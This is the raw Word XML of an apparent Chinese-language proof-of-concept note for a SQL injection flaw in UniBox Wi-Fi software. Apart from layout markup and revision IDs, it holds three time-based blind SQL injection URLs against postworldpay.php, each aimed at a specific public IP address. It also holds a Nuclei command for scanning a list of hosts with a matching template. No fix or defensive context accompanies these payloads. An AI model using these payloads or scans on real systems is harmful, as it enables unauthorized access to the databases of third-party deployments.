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DA26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body="UniBox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EC0E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3779520"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1143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3AEA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"https://www.wifi-soft.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.wifi-soft.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6597FCC9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5268595" cy="2188845"/>
            <wp:effectExtent l="0" t="0" r="8255" b="190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793C4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5266055" cy="3134360"/>
            <wp:effectExtent l="0" t="0" r="10795" b="889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341495"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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4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D91CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEFF90E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2301752D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C08264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53166F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2.Nuclei：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE531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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:66pt;width:72.7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25" DrawAspect="Icon" ObjectID="_1468075725" r:id="rId8">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="701459F3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Poc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAFC8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http://103.121.26.106/api/postworldpay.php?successpage=1&amp;failpage=1&amp;transactionid=1&amp;amount=1&amp;status=1&amp;insetid=1+AND+(SELECT+9480+FROM+(SELECT(SLEEP(3)))ilJI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128749E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770" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="508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A782E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"http://103.53.75.116/api/postworldpay.php?successpage=1&amp;failpage=1&amp;transactionid=1&amp;amount=1&amp;status=1&amp;insetid=1+AND+(SELECT+9480+FROM+(SELECT(SLEEP(3)))ilJI)"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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://103.53.75.116/api/postworldpay.php?successpage=1&amp;failpage=1&amp;transactionid=1&amp;amount=1&amp;status=1&amp;insetid=1+AND+(SELECT+9480+FROM+(SELECT(SLEEP(3)))ilJI)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76AD7DA3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5420" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1524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DABB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http://185.119.203.32:8080/api/postworldpay.php?successpage=1&amp;failpage=1&amp;transactionid=1&amp;amount=1&amp;status=1&amp;insetid=1+AND+(SELECT+9480+FROM+(SELECT(SLEEP(3)))ilJI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58012C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="1305560"/>
            <wp:effectExtent l="0" t="0" r="12065" b="889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586ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACF9A11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Subs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15832E8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nuclei.exe -t unibox-route-postw</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>orldpay-sql.yaml -l subs.txt -stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569D2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1769110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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D6C9FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4CD6C9FF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1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="000D53A1"/>
    <w:rsid w:val="00202EF2"/>
    <w:rsid w:val="002F5E05"/>
    <w:rsid w:val="003241E1"/>
    <w:rsid w:val="00D348C5"/>
    <w:rsid w:val="00EA6A45"/>
    <w:rsid w:val="011A24F4"/>
    <w:rsid w:val="013B4944"/>
    <w:rsid w:val="01491054"/>
    <w:rsid w:val="0151634A"/>
    <w:rsid w:val="01691BDB"/>
    <w:rsid w:val="019D55FE"/>
    <w:rsid w:val="01A257B4"/>
    <w:rsid w:val="01AF1A02"/>
    <w:rsid w:val="01DF21F2"/>
    <w:rsid w:val="01E65CA9"/>
    <w:rsid w:val="01F01DC8"/>
    <w:rsid w:val="020C008E"/>
    <w:rsid w:val="02117ADA"/>
    <w:rsid w:val="0212598F"/>
    <w:rsid w:val="03060F81"/>
    <w:rsid w:val="03324208"/>
    <w:rsid w:val="03373831"/>
    <w:rsid w:val="038753D5"/>
    <w:rsid w:val="03BB6210"/>
    <w:rsid w:val="03F41C86"/>
    <w:rsid w:val="03FB0D58"/>
    <w:rsid w:val="04210E57"/>
    <w:rsid w:val="0443630F"/>
    <w:rsid w:val="0450610D"/>
    <w:rsid w:val="04770389"/>
    <w:rsid w:val="056A1C9B"/>
    <w:rsid w:val="05721DB6"/>
    <w:rsid w:val="058739B8"/>
    <w:rsid w:val="058A1853"/>
    <w:rsid w:val="05AD6162"/>
    <w:rsid w:val="05DD06BF"/>
    <w:rsid w:val="05EE4EDE"/>
    <w:rsid w:val="06455AA6"/>
    <w:rsid w:val="064C5349"/>
    <w:rsid w:val="064C5BC6"/>
    <w:rsid w:val="06654211"/>
    <w:rsid w:val="07280E5C"/>
    <w:rsid w:val="074B1659"/>
    <w:rsid w:val="0799179F"/>
    <w:rsid w:val="07A736DE"/>
    <w:rsid w:val="07EF64D4"/>
    <w:rsid w:val="07F77E76"/>
    <w:rsid w:val="08B468F8"/>
    <w:rsid w:val="08CB5D31"/>
    <w:rsid w:val="08CC0577"/>
    <w:rsid w:val="08E43623"/>
    <w:rsid w:val="08E549F5"/>
    <w:rsid w:val="09156B25"/>
    <w:rsid w:val="096E7880"/>
    <w:rsid w:val="09830DF2"/>
    <w:rsid w:val="09ED69F7"/>
    <w:rsid w:val="09FC086D"/>
    <w:rsid w:val="0A2829C8"/>
    <w:rsid w:val="0A8A2498"/>
    <w:rsid w:val="0AD54ABA"/>
    <w:rsid w:val="0B1323BC"/>
    <w:rsid w:val="0B7F5D75"/>
    <w:rsid w:val="0C561593"/>
    <w:rsid w:val="0C8D16BA"/>
    <w:rsid w:val="0CFD385D"/>
    <w:rsid w:val="0D0E4978"/>
    <w:rsid w:val="0D462D5E"/>
    <w:rsid w:val="0D5E7A4B"/>
    <w:rsid w:val="0D735465"/>
    <w:rsid w:val="0DB93DE9"/>
    <w:rsid w:val="0DDF3802"/>
    <w:rsid w:val="0DE549DB"/>
    <w:rsid w:val="0E013AA6"/>
    <w:rsid w:val="0E2B3F92"/>
    <w:rsid w:val="0E3978E0"/>
    <w:rsid w:val="0EBD2C2C"/>
    <w:rsid w:val="0F075DB7"/>
    <w:rsid w:val="0F211F00"/>
    <w:rsid w:val="0F490B74"/>
    <w:rsid w:val="0F7D081D"/>
    <w:rsid w:val="0F8359FA"/>
    <w:rsid w:val="0F9B2092"/>
    <w:rsid w:val="105E354F"/>
    <w:rsid w:val="10894C2E"/>
    <w:rsid w:val="10B434F4"/>
    <w:rsid w:val="10E9721A"/>
    <w:rsid w:val="10F25629"/>
    <w:rsid w:val="10F90377"/>
    <w:rsid w:val="11025D89"/>
    <w:rsid w:val="112371A2"/>
    <w:rsid w:val="115B2158"/>
    <w:rsid w:val="115F467E"/>
    <w:rsid w:val="117D68B3"/>
    <w:rsid w:val="11922438"/>
    <w:rsid w:val="11A50FAD"/>
    <w:rsid w:val="11B57CFB"/>
    <w:rsid w:val="11D82C36"/>
    <w:rsid w:val="11E86E62"/>
    <w:rsid w:val="12581A0E"/>
    <w:rsid w:val="126900CE"/>
    <w:rsid w:val="12F930C3"/>
    <w:rsid w:val="1317547E"/>
    <w:rsid w:val="131C5736"/>
    <w:rsid w:val="13682F98"/>
    <w:rsid w:val="13A85D6F"/>
    <w:rsid w:val="13BD6CEF"/>
    <w:rsid w:val="13E378F1"/>
    <w:rsid w:val="13FE2FFC"/>
    <w:rsid w:val="14530295"/>
    <w:rsid w:val="14E87D49"/>
    <w:rsid w:val="15090F73"/>
    <w:rsid w:val="150F2E19"/>
    <w:rsid w:val="15112E59"/>
    <w:rsid w:val="15BE749A"/>
    <w:rsid w:val="16045210"/>
    <w:rsid w:val="16143E01"/>
    <w:rsid w:val="161B1921"/>
    <w:rsid w:val="16797889"/>
    <w:rsid w:val="167C30C3"/>
    <w:rsid w:val="16860244"/>
    <w:rsid w:val="16922E00"/>
    <w:rsid w:val="16A82F3A"/>
    <w:rsid w:val="16F615E1"/>
    <w:rsid w:val="17155AED"/>
    <w:rsid w:val="17373F82"/>
    <w:rsid w:val="17A326FA"/>
    <w:rsid w:val="17F04282"/>
    <w:rsid w:val="183E5E44"/>
    <w:rsid w:val="1892304F"/>
    <w:rsid w:val="18A83998"/>
    <w:rsid w:val="196A1E12"/>
    <w:rsid w:val="196D69C8"/>
    <w:rsid w:val="19A96799"/>
    <w:rsid w:val="19D35C88"/>
    <w:rsid w:val="19DD306D"/>
    <w:rsid w:val="19E35721"/>
    <w:rsid w:val="1A280498"/>
    <w:rsid w:val="1A5A5DBB"/>
    <w:rsid w:val="1AF65748"/>
    <w:rsid w:val="1B1E543C"/>
    <w:rsid w:val="1B5A5E46"/>
    <w:rsid w:val="1BC44458"/>
    <w:rsid w:val="1BF743EF"/>
    <w:rsid w:val="1C8634F0"/>
    <w:rsid w:val="1D180364"/>
    <w:rsid w:val="1D8F62F3"/>
    <w:rsid w:val="1D9A121F"/>
    <w:rsid w:val="1DA476EE"/>
    <w:rsid w:val="1DE36113"/>
    <w:rsid w:val="1E1E4B3D"/>
    <w:rsid w:val="1E2C74F6"/>
    <w:rsid w:val="1E312B1D"/>
    <w:rsid w:val="1E8F6475"/>
    <w:rsid w:val="1ECE3356"/>
    <w:rsid w:val="1EFE6FB6"/>
    <w:rsid w:val="1F073974"/>
    <w:rsid w:val="1F502E6E"/>
    <w:rsid w:val="1FC77337"/>
    <w:rsid w:val="1FD65821"/>
    <w:rsid w:val="2195103F"/>
    <w:rsid w:val="222334A6"/>
    <w:rsid w:val="223F5B17"/>
    <w:rsid w:val="22653C1A"/>
    <w:rsid w:val="22673393"/>
    <w:rsid w:val="22925F36"/>
    <w:rsid w:val="22933649"/>
    <w:rsid w:val="22B70B00"/>
    <w:rsid w:val="22D1722D"/>
    <w:rsid w:val="22E25ADE"/>
    <w:rsid w:val="230C63BD"/>
    <w:rsid w:val="2380169C"/>
    <w:rsid w:val="23BC54AD"/>
    <w:rsid w:val="23F5277D"/>
    <w:rsid w:val="240253A0"/>
    <w:rsid w:val="243557D5"/>
    <w:rsid w:val="24805218"/>
    <w:rsid w:val="24B1014E"/>
    <w:rsid w:val="24CD3A89"/>
    <w:rsid w:val="24D420EB"/>
    <w:rsid w:val="24DA4A09"/>
    <w:rsid w:val="24DA564B"/>
    <w:rsid w:val="253641B3"/>
    <w:rsid w:val="2585101D"/>
    <w:rsid w:val="25A36C3A"/>
    <w:rsid w:val="25E5177E"/>
    <w:rsid w:val="26093577"/>
    <w:rsid w:val="261168A1"/>
    <w:rsid w:val="26322018"/>
    <w:rsid w:val="26675E5D"/>
    <w:rsid w:val="26775B6F"/>
    <w:rsid w:val="26A26BCE"/>
    <w:rsid w:val="27034482"/>
    <w:rsid w:val="273740AB"/>
    <w:rsid w:val="27571200"/>
    <w:rsid w:val="27611066"/>
    <w:rsid w:val="276D53C1"/>
    <w:rsid w:val="2777374E"/>
    <w:rsid w:val="27AC5CEC"/>
    <w:rsid w:val="27E04077"/>
    <w:rsid w:val="28651585"/>
    <w:rsid w:val="287D51FA"/>
    <w:rsid w:val="28C0181B"/>
    <w:rsid w:val="28E45704"/>
    <w:rsid w:val="28E978C7"/>
    <w:rsid w:val="29193C14"/>
    <w:rsid w:val="294E705B"/>
    <w:rsid w:val="297A2DFF"/>
    <w:rsid w:val="299815A5"/>
    <w:rsid w:val="29C93C00"/>
    <w:rsid w:val="2A1046A7"/>
    <w:rsid w:val="2A6D2ED2"/>
    <w:rsid w:val="2A7530F1"/>
    <w:rsid w:val="2A89309F"/>
    <w:rsid w:val="2AAF6413"/>
    <w:rsid w:val="2AB23619"/>
    <w:rsid w:val="2B075097"/>
    <w:rsid w:val="2B1B3AE9"/>
    <w:rsid w:val="2B5D7831"/>
    <w:rsid w:val="2BC469DF"/>
    <w:rsid w:val="2C0F204E"/>
    <w:rsid w:val="2C420DA8"/>
    <w:rsid w:val="2C457F7E"/>
    <w:rsid w:val="2C5A138F"/>
    <w:rsid w:val="2C965046"/>
    <w:rsid w:val="2CD522A4"/>
    <w:rsid w:val="2CED26E7"/>
    <w:rsid w:val="2CF52C77"/>
    <w:rsid w:val="2CFA3411"/>
    <w:rsid w:val="2D2D7AAC"/>
    <w:rsid w:val="2D2E552D"/>
    <w:rsid w:val="2DE31109"/>
    <w:rsid w:val="2DE65084"/>
    <w:rsid w:val="2DF47AA5"/>
    <w:rsid w:val="2E7B47FD"/>
    <w:rsid w:val="2E980D78"/>
    <w:rsid w:val="2EA06961"/>
    <w:rsid w:val="2EA3668F"/>
    <w:rsid w:val="2EDF0755"/>
    <w:rsid w:val="2EDF14BE"/>
    <w:rsid w:val="2F386DBF"/>
    <w:rsid w:val="2F694AB0"/>
    <w:rsid w:val="2FC76426"/>
    <w:rsid w:val="3053262C"/>
    <w:rsid w:val="30FC4126"/>
    <w:rsid w:val="31003746"/>
    <w:rsid w:val="3106021B"/>
    <w:rsid w:val="31295890"/>
    <w:rsid w:val="32B40D7C"/>
    <w:rsid w:val="335214F5"/>
    <w:rsid w:val="33813D35"/>
    <w:rsid w:val="33AB1655"/>
    <w:rsid w:val="33D068BE"/>
    <w:rsid w:val="33E365F1"/>
    <w:rsid w:val="3443482E"/>
    <w:rsid w:val="344730B4"/>
    <w:rsid w:val="345D4201"/>
    <w:rsid w:val="3466475F"/>
    <w:rsid w:val="34781430"/>
    <w:rsid w:val="34976CD4"/>
    <w:rsid w:val="34A73AC3"/>
    <w:rsid w:val="34B01683"/>
    <w:rsid w:val="34B25DEE"/>
    <w:rsid w:val="35026144"/>
    <w:rsid w:val="35036491"/>
    <w:rsid w:val="35157505"/>
    <w:rsid w:val="351849C1"/>
    <w:rsid w:val="352B1E2A"/>
    <w:rsid w:val="35527ED3"/>
    <w:rsid w:val="35787EB2"/>
    <w:rsid w:val="358C62E7"/>
    <w:rsid w:val="35BE0A09"/>
    <w:rsid w:val="35D266A5"/>
    <w:rsid w:val="360D5BA8"/>
    <w:rsid w:val="360F7B72"/>
    <w:rsid w:val="36627694"/>
    <w:rsid w:val="36806A78"/>
    <w:rsid w:val="369B553D"/>
    <w:rsid w:val="36D13079"/>
    <w:rsid w:val="37F627D6"/>
    <w:rsid w:val="386514C3"/>
    <w:rsid w:val="387A58E0"/>
    <w:rsid w:val="38994363"/>
    <w:rsid w:val="38CC622B"/>
    <w:rsid w:val="392F3EDF"/>
    <w:rsid w:val="39367CA0"/>
    <w:rsid w:val="39A13F26"/>
    <w:rsid w:val="39B07546"/>
    <w:rsid w:val="3A045513"/>
    <w:rsid w:val="3A2D4A6A"/>
    <w:rsid w:val="3A63223A"/>
    <w:rsid w:val="3A6C2E0F"/>
    <w:rsid w:val="3A8C0A4A"/>
    <w:rsid w:val="3AA008BD"/>
    <w:rsid w:val="3AA518ED"/>
    <w:rsid w:val="3AD0169E"/>
    <w:rsid w:val="3AE15F1A"/>
    <w:rsid w:val="3B0C0B24"/>
    <w:rsid w:val="3B1E118C"/>
    <w:rsid w:val="3B426FBC"/>
    <w:rsid w:val="3B596336"/>
    <w:rsid w:val="3B927FAC"/>
    <w:rsid w:val="3BA72C58"/>
    <w:rsid w:val="3BAE4409"/>
    <w:rsid w:val="3BC211E2"/>
    <w:rsid w:val="3BDF6A5D"/>
    <w:rsid w:val="3C1F6635"/>
    <w:rsid w:val="3C5E791A"/>
    <w:rsid w:val="3C887100"/>
    <w:rsid w:val="3CEE22A4"/>
    <w:rsid w:val="3D241208"/>
    <w:rsid w:val="3D421E06"/>
    <w:rsid w:val="3D8366DF"/>
    <w:rsid w:val="3D842BF3"/>
    <w:rsid w:val="3D8A7863"/>
    <w:rsid w:val="3DA06A0D"/>
    <w:rsid w:val="3DA44DD0"/>
    <w:rsid w:val="3DF1136B"/>
    <w:rsid w:val="3E4E61E9"/>
    <w:rsid w:val="3EC97E6D"/>
    <w:rsid w:val="3F172290"/>
    <w:rsid w:val="3F694271"/>
    <w:rsid w:val="3FA4757D"/>
    <w:rsid w:val="3FD70C44"/>
    <w:rsid w:val="40011C8E"/>
    <w:rsid w:val="40786313"/>
    <w:rsid w:val="40A610D2"/>
    <w:rsid w:val="40E96229"/>
    <w:rsid w:val="41302AA1"/>
    <w:rsid w:val="417137CD"/>
    <w:rsid w:val="41A75AF3"/>
    <w:rsid w:val="41DD7EA2"/>
    <w:rsid w:val="41DE0663"/>
    <w:rsid w:val="41E01774"/>
    <w:rsid w:val="42332EA8"/>
    <w:rsid w:val="428D34C8"/>
    <w:rsid w:val="42B42080"/>
    <w:rsid w:val="42BA3A05"/>
    <w:rsid w:val="42D20D4A"/>
    <w:rsid w:val="42E533F0"/>
    <w:rsid w:val="43147E8E"/>
    <w:rsid w:val="432307B8"/>
    <w:rsid w:val="432E265D"/>
    <w:rsid w:val="435E7A42"/>
    <w:rsid w:val="4360210D"/>
    <w:rsid w:val="437E3D5E"/>
    <w:rsid w:val="438E0F66"/>
    <w:rsid w:val="43BA1B75"/>
    <w:rsid w:val="43D51F31"/>
    <w:rsid w:val="43ED0DC6"/>
    <w:rsid w:val="44110F59"/>
    <w:rsid w:val="44295679"/>
    <w:rsid w:val="444F35A2"/>
    <w:rsid w:val="446961BB"/>
    <w:rsid w:val="44A5726A"/>
    <w:rsid w:val="44B51A9F"/>
    <w:rsid w:val="44C6179E"/>
    <w:rsid w:val="45516648"/>
    <w:rsid w:val="456B3216"/>
    <w:rsid w:val="4579261F"/>
    <w:rsid w:val="458361FD"/>
    <w:rsid w:val="46040D75"/>
    <w:rsid w:val="46113492"/>
    <w:rsid w:val="46130FB8"/>
    <w:rsid w:val="46221C41"/>
    <w:rsid w:val="462369A1"/>
    <w:rsid w:val="463A5E4A"/>
    <w:rsid w:val="46430F58"/>
    <w:rsid w:val="464F78B8"/>
    <w:rsid w:val="468E6891"/>
    <w:rsid w:val="469911C5"/>
    <w:rsid w:val="46B502C1"/>
    <w:rsid w:val="46BC589A"/>
    <w:rsid w:val="46BD2CD2"/>
    <w:rsid w:val="47243FC5"/>
    <w:rsid w:val="474358CD"/>
    <w:rsid w:val="47B16F33"/>
    <w:rsid w:val="47BA644B"/>
    <w:rsid w:val="47F72214"/>
    <w:rsid w:val="48147269"/>
    <w:rsid w:val="48153421"/>
    <w:rsid w:val="48DB648C"/>
    <w:rsid w:val="492B43F9"/>
    <w:rsid w:val="49A104ED"/>
    <w:rsid w:val="49CF5564"/>
    <w:rsid w:val="49FA55DC"/>
    <w:rsid w:val="49FB0274"/>
    <w:rsid w:val="4AC62A9D"/>
    <w:rsid w:val="4AC7413B"/>
    <w:rsid w:val="4BBF5506"/>
    <w:rsid w:val="4BDE7972"/>
    <w:rsid w:val="4C1B7A77"/>
    <w:rsid w:val="4C550081"/>
    <w:rsid w:val="4C910E89"/>
    <w:rsid w:val="4CA26BF2"/>
    <w:rsid w:val="4D07739D"/>
    <w:rsid w:val="4D54534E"/>
    <w:rsid w:val="4DF7463E"/>
    <w:rsid w:val="4E443003"/>
    <w:rsid w:val="4E807C9D"/>
    <w:rsid w:val="4E8C5DAC"/>
    <w:rsid w:val="4E9133C2"/>
    <w:rsid w:val="4E9E6D0A"/>
    <w:rsid w:val="4EA77955"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4EE023A9"/>
    <w:rsid w:val="4EF4576E"/>
    <w:rsid w:val="4F336227"/>
    <w:rsid w:val="4F4F4BDD"/>
    <w:rsid w:val="4F735C80"/>
    <w:rsid w:val="4F77327D"/>
    <w:rsid w:val="4F7E0512"/>
    <w:rsid w:val="4F8F2D01"/>
    <w:rsid w:val="4F960564"/>
    <w:rsid w:val="4FB22170"/>
    <w:rsid w:val="50272390"/>
    <w:rsid w:val="505C47D9"/>
    <w:rsid w:val="50635E13"/>
    <w:rsid w:val="509D0301"/>
    <w:rsid w:val="511E4CB5"/>
    <w:rsid w:val="513D1358"/>
    <w:rsid w:val="5146436C"/>
    <w:rsid w:val="514F30C0"/>
    <w:rsid w:val="51694182"/>
    <w:rsid w:val="51785239"/>
    <w:rsid w:val="520605DB"/>
    <w:rsid w:val="52147B4A"/>
    <w:rsid w:val="522252DD"/>
    <w:rsid w:val="522668C5"/>
    <w:rsid w:val="523D1466"/>
    <w:rsid w:val="524644C3"/>
    <w:rsid w:val="5295559B"/>
    <w:rsid w:val="52AB3BF3"/>
    <w:rsid w:val="52B0193D"/>
    <w:rsid w:val="52C84509"/>
    <w:rsid w:val="52DE7222"/>
    <w:rsid w:val="534C3D5B"/>
    <w:rsid w:val="53530C46"/>
    <w:rsid w:val="537A07AD"/>
    <w:rsid w:val="5383760A"/>
    <w:rsid w:val="53CE790C"/>
    <w:rsid w:val="54242702"/>
    <w:rsid w:val="54B6484A"/>
    <w:rsid w:val="54F827B1"/>
    <w:rsid w:val="550B10E8"/>
    <w:rsid w:val="555F2FEC"/>
    <w:rsid w:val="55F703C7"/>
    <w:rsid w:val="56124737"/>
    <w:rsid w:val="56387631"/>
    <w:rsid w:val="56432AFD"/>
    <w:rsid w:val="565079AB"/>
    <w:rsid w:val="57376AD1"/>
    <w:rsid w:val="574F0F3B"/>
    <w:rsid w:val="57BB6BFD"/>
    <w:rsid w:val="58056EA2"/>
    <w:rsid w:val="58242D92"/>
    <w:rsid w:val="58641614"/>
    <w:rsid w:val="58D36385"/>
    <w:rsid w:val="58EA2A7A"/>
    <w:rsid w:val="59142A73"/>
    <w:rsid w:val="596F62C5"/>
    <w:rsid w:val="598C79BE"/>
    <w:rsid w:val="59BF48C5"/>
    <w:rsid w:val="59D81D4B"/>
    <w:rsid w:val="5A152C05"/>
    <w:rsid w:val="5A1B6236"/>
    <w:rsid w:val="5A8111AE"/>
    <w:rsid w:val="5ACD7484"/>
    <w:rsid w:val="5B0B3DCE"/>
    <w:rsid w:val="5B214990"/>
    <w:rsid w:val="5B5C4D58"/>
    <w:rsid w:val="5B8A3637"/>
    <w:rsid w:val="5BAE26C4"/>
    <w:rsid w:val="5C6300BB"/>
    <w:rsid w:val="5CF1118F"/>
    <w:rsid w:val="5D6D4FFA"/>
    <w:rsid w:val="5D845EA0"/>
    <w:rsid w:val="5DD451FE"/>
    <w:rsid w:val="5DD83C04"/>
    <w:rsid w:val="5E067BFA"/>
    <w:rsid w:val="5EA507C4"/>
    <w:rsid w:val="5EA51A63"/>
    <w:rsid w:val="5EF61161"/>
    <w:rsid w:val="5F4E4A6A"/>
    <w:rsid w:val="5FB76A00"/>
    <w:rsid w:val="5FDD794C"/>
    <w:rsid w:val="60B105D3"/>
    <w:rsid w:val="60F44AEB"/>
    <w:rsid w:val="6170126D"/>
    <w:rsid w:val="6173793B"/>
    <w:rsid w:val="61830E6B"/>
    <w:rsid w:val="61964B72"/>
    <w:rsid w:val="61A46B11"/>
    <w:rsid w:val="62007857"/>
    <w:rsid w:val="62030153"/>
    <w:rsid w:val="628E196B"/>
    <w:rsid w:val="629F6A6C"/>
    <w:rsid w:val="630E06E5"/>
    <w:rsid w:val="633F75AA"/>
    <w:rsid w:val="63546939"/>
    <w:rsid w:val="63A1188C"/>
    <w:rsid w:val="63EB7D15"/>
    <w:rsid w:val="644120F0"/>
    <w:rsid w:val="645D122F"/>
    <w:rsid w:val="6471446C"/>
    <w:rsid w:val="64952D13"/>
    <w:rsid w:val="64B238B7"/>
    <w:rsid w:val="64B33C3A"/>
    <w:rsid w:val="64FF6447"/>
    <w:rsid w:val="650A75D2"/>
    <w:rsid w:val="654608F8"/>
    <w:rsid w:val="655C2C23"/>
    <w:rsid w:val="656868EF"/>
    <w:rsid w:val="65FE0EE5"/>
    <w:rsid w:val="665B47FB"/>
    <w:rsid w:val="66EA7B14"/>
    <w:rsid w:val="67232E92"/>
    <w:rsid w:val="67531912"/>
    <w:rsid w:val="677303A5"/>
    <w:rsid w:val="67B57B22"/>
    <w:rsid w:val="67BB30D1"/>
    <w:rsid w:val="68104BA3"/>
    <w:rsid w:val="682D4F2F"/>
    <w:rsid w:val="683E0616"/>
    <w:rsid w:val="684D057F"/>
    <w:rsid w:val="6855015C"/>
    <w:rsid w:val="68CD5ACC"/>
    <w:rsid w:val="699911C9"/>
    <w:rsid w:val="69A64965"/>
    <w:rsid w:val="69C83BBA"/>
    <w:rsid w:val="6A4A3D1A"/>
    <w:rsid w:val="6A8812C9"/>
    <w:rsid w:val="6AAF133E"/>
    <w:rsid w:val="6B234F4A"/>
    <w:rsid w:val="6B285EAC"/>
    <w:rsid w:val="6B3A0868"/>
    <w:rsid w:val="6B3C7DBA"/>
    <w:rsid w:val="6B7D7572"/>
    <w:rsid w:val="6B894D7E"/>
    <w:rsid w:val="6BF6615A"/>
    <w:rsid w:val="6CCC611B"/>
    <w:rsid w:val="6CE64481"/>
    <w:rsid w:val="6CF41172"/>
    <w:rsid w:val="6D06786D"/>
    <w:rsid w:val="6D1C4347"/>
    <w:rsid w:val="6D40540A"/>
    <w:rsid w:val="6D6A50B2"/>
    <w:rsid w:val="6D9D06E2"/>
    <w:rsid w:val="6E6623CD"/>
    <w:rsid w:val="6ED00578"/>
    <w:rsid w:val="6EE05876"/>
    <w:rsid w:val="6EF3427B"/>
    <w:rsid w:val="6F0F4163"/>
    <w:rsid w:val="6FB97C2B"/>
    <w:rsid w:val="6FC146B7"/>
    <w:rsid w:val="6FF84BF7"/>
    <w:rsid w:val="70216B9A"/>
    <w:rsid w:val="7093483C"/>
    <w:rsid w:val="70E37655"/>
    <w:rsid w:val="710F1337"/>
    <w:rsid w:val="711D41EA"/>
    <w:rsid w:val="712544FD"/>
    <w:rsid w:val="71444D4C"/>
    <w:rsid w:val="71520C85"/>
    <w:rsid w:val="7155560B"/>
    <w:rsid w:val="71767403"/>
    <w:rsid w:val="71833BD0"/>
    <w:rsid w:val="718E1BE3"/>
    <w:rsid w:val="71ED6B7A"/>
    <w:rsid w:val="71FC5723"/>
    <w:rsid w:val="721D4D44"/>
    <w:rsid w:val="72227C97"/>
    <w:rsid w:val="72C46456"/>
    <w:rsid w:val="72EB0A43"/>
    <w:rsid w:val="72EC5D52"/>
    <w:rsid w:val="732B7092"/>
    <w:rsid w:val="73306A64"/>
    <w:rsid w:val="735E679E"/>
    <w:rsid w:val="738B299C"/>
    <w:rsid w:val="73B260DF"/>
    <w:rsid w:val="73D0568F"/>
    <w:rsid w:val="73F711A6"/>
    <w:rsid w:val="746D0CF1"/>
    <w:rsid w:val="74890423"/>
    <w:rsid w:val="74B23A83"/>
    <w:rsid w:val="751C1388"/>
    <w:rsid w:val="754B2D1C"/>
    <w:rsid w:val="756E6962"/>
    <w:rsid w:val="757C4678"/>
    <w:rsid w:val="75B20CA2"/>
    <w:rsid w:val="75B361E2"/>
    <w:rsid w:val="75BE2D16"/>
    <w:rsid w:val="75D02BD6"/>
    <w:rsid w:val="75E66FE6"/>
    <w:rsid w:val="75F714AD"/>
    <w:rsid w:val="76155969"/>
    <w:rsid w:val="762A5DB3"/>
    <w:rsid w:val="76723902"/>
    <w:rsid w:val="76742AFE"/>
    <w:rsid w:val="76C57AE8"/>
    <w:rsid w:val="76E83A54"/>
    <w:rsid w:val="76F4407F"/>
    <w:rsid w:val="77171B2C"/>
    <w:rsid w:val="771D3195"/>
    <w:rsid w:val="773341A1"/>
    <w:rsid w:val="77375B0A"/>
    <w:rsid w:val="77377B75"/>
    <w:rsid w:val="77383B2B"/>
    <w:rsid w:val="77533873"/>
    <w:rsid w:val="775363CA"/>
    <w:rsid w:val="777261D1"/>
    <w:rsid w:val="779D7E32"/>
    <w:rsid w:val="77A52B1E"/>
    <w:rsid w:val="77EA6BD9"/>
    <w:rsid w:val="77FF2832"/>
    <w:rsid w:val="78370287"/>
    <w:rsid w:val="7854125C"/>
    <w:rsid w:val="786C5911"/>
